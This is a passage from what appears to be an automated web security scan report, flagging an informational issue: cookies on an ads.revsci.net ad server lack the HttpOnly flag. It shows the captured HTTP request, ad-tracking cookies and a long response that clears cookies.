Set-Cookie: rsi_us_1000000="pUMd5c2g/xMQ7V5vYJPD0C371lz7qzCPyctfVDXpp0hSLiyOnv8o9V31fTGzYVlly8cr+J2K6AddxvkNjEpT97+05FckBCjXgdMoWcJ+ZDwmTcmvYnaIAWGslXxRlOjyV0yAeF49BvV5wpBw+PAcJGEfuZqf4tqqccxTORX1uqAjTGan1Zaz6sFHSlwFp9OFyA4PCX928q9pyfVSQRHvdV31dgthTb9Tyj7QSV2cVknMw9iw649LdmB7mpU66PajssRrBK7SjdCY/Fc73BkSDCyvcG6h+2s3Rt1jQ1ejpGNd69FB3C193XxQSRJf/9mRpMOHWv3eViIHmLFWqfTR/A9H7j8Ukx49aPa+dnzBItPPH3YI0uFs+fk7r+LK0MsXGwZ6wpkhH6IuoSqStg2Aaiv0cH31+GRBoyUfk+adg2PbI3InOF5nzOD+I2/xJydlfQMPtwuA9UYTbCsXIcrSmc67UaV3jvPM+4TXQzLpbyfcpZBKQKB8AYEiR7n1+LKzfrBKhl5y4Sc9k1WiHRpD777eKMmrZeEtBMENXnfe2BlxJcMS4rhLvBKA7Yrct30ge2qHzHI1b2bguElaKc1LSFhqx1hLlZwnMVqJAHyTZDnILEGYiEYpJiilDTMdLfeZkUYBVO+VUbqM9MrKfDS7bhBjMDE4uZ0EqktoLuwbm2/ctzNmKdD+ZCVwx4yJoyJuU9j2tFkezn2g5+nd76Mb2XYD7FOwIdAEw5JNzYOU16pgQ9bX0MN0m4vYcg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:16 GMT
Content-Length: 657

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.25. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1006093-1086373-1264419-1086372-1086371-1086370-1086369-1347038-1086733-1404407-317325-75921-1061877 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=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; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_LVUM="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYNfmdo4272ogCIBDOimYv4fEg9zw6j4jrFvDEmjHCoJT8voGTLmJnWzvbs49kTDrTctUCdQ99o84r443+VA4/6HCW3/BRNAYl5aPcaD1s59ilv5lMNITjZH4Wthbsni1n3csqYpkQ4kjzeD9Ag7v0g8pQ43kHlf0zkVU4="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bTBF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bEm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VfeO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YqeU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Dgt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PHh7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R5ta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sB-Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LIlC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rEo0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ig3D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5dcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dZVt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nZdO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jrA8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-EDR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LfdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w3Ik=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2hxF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s6i9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qpw9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9q7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X_m0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-vTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dp_w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zi3a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EVuz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hG-O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3uh_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ed-o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DgP-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IyHz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9wJ3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3AjH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OeQh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJJI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IKnw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FRRz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z-ZL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BlDK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Uce7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hYlJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tvYV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N2Wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xwgv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NpBx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7yN0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ytn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R0nn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jHB4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tbod=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dJ-5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tZle=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tAk2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2wEa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcnD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dTlc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RcWU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mv19=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nBsJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cIpx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qQG7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TK1Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebC_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0lxQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W97N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-cAf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fEAy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DcHG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-kXI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mvhC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jgOQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sECh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BUMx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aOWp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nXqC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DJxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_m2_A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M0jo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_I-qW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PC0B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OcGH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lpX7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x85Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Y4G3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DxQf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WxUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qxKk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DMxV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_irVm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9NFF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lc2G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Vs1Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zrkg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BAU5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6_lC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nHxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R12Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AFG2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DAxJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OiN2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_22wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9z65=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cWvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6AGk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X5fA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCLB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VeZQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GdYU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Nuyz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9LuU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8hPO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__hgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zCmS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zB78=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3cxz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0Svs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tIki=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VmnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VnuE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jU0b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FnTH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8VJk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-r_t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_c9Qy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_okZc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_f9hD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_piZk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_amP2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jzux=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_S261=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_U-lS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GRM2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru44=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_05qP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WUD5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_37Ra=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pdjm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wQ9i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TgmM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_F1aA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtKf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qaRA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxPB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AOct=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Hvpv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_umeK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Bqao=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zXe7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mcS7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nSV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dXYl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_r5h4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YGYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uOdh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t8un=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UhXN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Yggs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tFKi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dMCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jUrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HPp6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3Us7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UTqe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NyfH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_C1HA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hCo4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5uBS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mAGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
